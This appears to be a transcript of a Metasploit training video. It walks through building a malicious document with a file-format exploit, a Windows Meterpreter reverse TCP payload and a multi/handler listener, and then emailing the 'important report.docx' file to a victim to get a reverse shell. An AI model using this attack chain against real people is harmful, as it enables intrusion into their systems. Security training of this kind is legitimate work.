Now, there are a number of applications that you use on a regular basis that make use of files. We can make use of Metasploit to target vulnerabilities within those applications. And so all I have to do here is search for file format. And there are a fair number of exploits that are available that take advantage of vulnerabilities in applications. So, for example, here's one that uses nuance PDF, and there's apparently an overflow vulnerability there. These are generally pretty easy to take advantage of. And let's just use a really simple one here, for example. Just grabbing one randomly. And I'm just going to copy this. And now I've got it copied. I can just paste it in. Now, if I say show options, what I've got is just the file name. I could set the file name here to something else. So I could say set file name to something. And then all I need to do is say exploit. And what that should be doing is generating the file for me. What we end up with should be a file that we could then send to somebody. What I don't have here is the ability at this point to interact with the system. And so I'm just going to kill this, say set payload to be Windows interpreter and then reverse TCP. And then I can set my L host to be 192.168.86.22. And I could set my L port to be, let's say, 5555. And now all I have to do is say exploit at this point, and we're going to create a file. And what it's going to do is it's going to give us the ability to, once the system has been exploited, get that reverse shell back from the targeted host. What I need to do once I've done that is I need to set up the reverse handler. And so in that case, what we would do would be to say use exploit multi handler. And then I would set my payload to be Windows interpreter reverse TCP. And then I could set my L port to be 5555 and then set my L host to be 192.168.86.22. And then I run exploit here. And now what I've got is a reverse TCP handler that is just waiting for a connection on port 5555. So all I need to do is send important report.docx to somebody. And here's where it is stored. If I send that to somebody, they open it up. If they are vulnerable to the vulnerability that we had targeted here, we may be able to exploit that vulnerability and then gain access to their system. So, this is another way that you can target client side attacks, and you can do it using file format vulnerabilities. And as I said earlier, there are a large number of exploits available in Metasploit that go after these file format vulnerabilities.